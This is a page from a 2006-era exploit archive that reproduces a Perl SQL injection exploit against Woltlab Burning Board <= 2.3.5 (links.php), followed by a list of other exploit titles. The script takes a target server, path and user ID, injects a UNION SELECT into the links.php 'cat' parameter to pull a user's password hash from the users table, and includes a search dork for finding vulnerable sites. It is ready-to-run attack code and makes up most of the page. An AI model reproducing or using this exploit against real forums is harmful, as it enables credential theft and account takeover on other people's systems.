exploits , vulnerabilities , articles , Woltlab Burning Board <= 2.3.5 (links.php) SQL Injection Exploit (2

2006-05-20 Woltlab Burning Board <= 2.3.4 (links.php) SQL Injection Exploit
2006-03-02 Woltlab Burning Board 2.x Datenbank MOD (fileid) Remote SQL Injection

2006-08-17

Woltlab Burning Board <= 2.3.5 (links.php) SQL Injection Exploit (2

Rated as : Moderate Risk

#!/usr/bin/perl

use IO::Socket;

print q{
################################################################################
##                                                                        
   ##
##  Woltlab Burning Board 2.3.5 <= "links.php" SQL Injection
Exploit          ##
##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -   
   ##
##  Exploit by       |  hias                                              
   ##
##  Googledork       |  inurl:/wbb2/links.php?cat                         
   ##
##  Usage            |  links.pl [server] [path] [userid]                 
   ##
##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -   
   ##
##                                                                        
   ##
################################################################################

};

$webpage = $ARGV[0];
$directory = $ARGV[1];
$userid = $ARGV[2];

if (!$webpage||!$directory) { die "[+] Exploit failed\n"; }

$wbb_dir = 
"http://".$webpage.$directory."links.php?cat=5474902010+union+select+password,username+from+bb1_users+where+userid=$userid";

$sock = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>"$webpage", 
PeerPort=>"80") || die "[+] Can't connect to
Server\n";
print "[+] Exploiting.....\n";
print $sock "GET $wbb_dir HTTP/1.1\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Hacker\n";
print $sock "Host: $webpage\n";
print $sock "Connection: close\n\n";

while ($answer = <$sock>) {
if ($answer =~ 
/(................................)<\/span><\/b><\/font>/)
{
print "[+] Hash: $1\n";
exit();
}
if ($answer =~ /SQL-DATABASE ERROR/) {
break;
}
}

$wbb_dir = 
"http://".$webpage.$directory."links.php?cat=5474902010+union+select+password,userid+from+bb1_users+where+userid=$userid";
close($sock);

$sock = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>"$webpage", 
PeerPort=>"80") || die "[+] Can't connect to
Server\n";
print $sock "GET $wbb_dir HTTP/1.1\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Hacker\n";
print $sock "Host: $webpage\n";
print $sock "Connection: close\n\n";

while ($answer = <$sock>) {
if ($answer =~ 
/(................................)<\/span><\/b><\/font>/)
{
print "[+] Hash: $1\n";
exit();
}
if ($answer =~ /SQL-DATABASE ERROR/) {
print "[+] Database doesn't exist. try replacing bb1_users with
bb2_users or bb3_users\n";
break;
}
}
close($sock);

print "[+] Exploit failed\n";
securitydot.net - 2006-08-17

Exploits - newest 10 RSS | More

2007-06-15 56415 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 33606 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 41771 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 28895 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19405 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16414 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19069 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16288 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33174 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 16940 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit